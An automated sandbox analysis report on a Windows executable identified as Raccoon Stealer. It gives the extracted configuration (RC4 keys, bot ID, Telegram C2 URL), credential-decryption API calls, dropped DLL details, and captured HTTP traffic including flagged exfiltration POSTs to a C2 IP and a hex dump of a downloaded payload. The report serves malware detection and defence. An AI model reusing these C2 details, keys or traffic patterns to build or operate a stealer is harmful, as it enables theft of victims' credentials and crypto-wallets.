Windows Analysis Report 31cGYywxgy

Overview

General Information

Sample Name: 31cGYywxgy (renamed file extension from none to exe)
Analysis ID: 491712
MD5: 7739202a73e3f1c15f5f5e6f82434955
SHA1: cb0d64026ee41d99bf74a1b4939442eb53e4bd84
SHA256: 626999cdbd44d491c59a9fd35b302f3c18d4c0599c08b53b80716661b0e803ff
Tags: 32exetrojan
Infos:

Most interesting Screenshot:

Detection

Raccoon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Mail credentials (via file access)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Binary contains a suspicious time stamp
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 0.2.31cGYywxgy.exe.400000.0.unpack Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}
Multi AV Scanner detection for submitted file
Source: 31cGYywxgy.exe ReversingLabs: Detection: 40%
Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR
Machine Learning detection for sample
Source: 31cGYywxgy.exe Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, 0_2_0042A130
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00429F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, 0_2_00429F5D
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0040E139 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData, 0_2_0040E139
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00434A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA, 0_2_00434A5F

Compliance:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Unpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack
Uses 32bit PE files
Source: 31cGYywxgy.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\31cGYywxgy.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source: Binary string: C:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source: Binary string: XC:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_0043EFDD

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49755 -> 194.180.174.100:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://t.me/agrybirdsgamerept
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: MIVOCLOUDMD MIVOCLOUDMD
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.100
Source: global traffic HTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
Source: global traffic HTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1017Host: 194.180.174.100
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 194.180.174.100 194.180.174.100
Source: Joe Sandbox View IP Address: 194.180.174.100 194.180.174.100
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 18:31:43 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: unknown TCP traffic detected without corresponding DNS query: 194.180.174.100
Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100/
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d167
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16T
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861ata
Source: 31cGYywxgy.exe, 00000000.00000003.276042748.0000000002D2A000.00000004.00000001.sdmp String found in binary or memory: http://194.180.174.100/Pv
Source: qipcap.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: qipcap.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.0.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.0.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp, nssckbi.dll.0.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: qipcap.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: qipcap.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: qipcap.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: qipcap.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: qipcap.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.0.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://ocsp.accv.es0
Source: qipcap.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: qipcap.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: qipcap.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.0.dr String found in binary or memory: http://repository.swisssign.com/0
Source: qipcap.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: qipcap.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: qipcap.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.0.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: qipcap.dll.0.dr String found in binary or memory: http://www.mozilla.com0
